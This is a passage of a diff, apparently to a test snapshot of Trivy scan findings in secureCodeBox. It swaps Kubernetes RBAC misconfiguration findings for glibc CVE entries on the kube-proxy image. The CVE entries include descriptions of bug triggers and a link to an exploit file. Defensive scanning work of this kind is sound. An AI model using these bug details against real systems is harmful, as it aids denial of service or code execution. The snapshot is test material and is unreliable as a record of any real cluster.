"Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security.gentoo.org/glsa/202107-07", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'admin' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-4756", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "category": "Vulnerability", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "http://cxib.net/stuff/glob-0day.c", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "http://securityreason.com/exploitalert/9223", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-20796", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", ], }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(ClusterRole 'edit' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "category": "Vulnerability", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "http://www.securityfocus.com/bid/107160", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: stack guard protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV050", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv050", - ], - }, - "category": "Misconfiguration", - "description": "An effective level of access equivalent to cluster-admin should not be provided.", - "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", - "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", - "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv050", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV050", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv050", - ], - }, - "category": "Misconfiguration", - "description": "An effective level of access equivalent to cluster-admin should not be provided.", - "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", - "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", - "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv050", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV045", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv045", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits wildcard verb on specific resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", - "mitigation": "Create a role which does not permit wildcard verb on specific resources", - "name": "No wildcard verb roles(Role permits wildcard verb on specific resources)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv045", + "value": "https://ubuntu.com/security/CVE-2019-1010022", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", ], }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'local-path-provisioner-role' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "http://www.securityfocus.com/bid/109167", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV050", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv050", - ], - }, - "category": "Misconfiguration", - "description": "An effective level of access equivalent to cluster-admin should not be provided.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-admin", - "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", - "name": "Do not allow management of RBAC resources(ClusterRole 'system:aggregate-to-admin' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv050", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/CVE-2019-1010023", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010024", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "http://www.securityfocus.com/bid/109162", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": 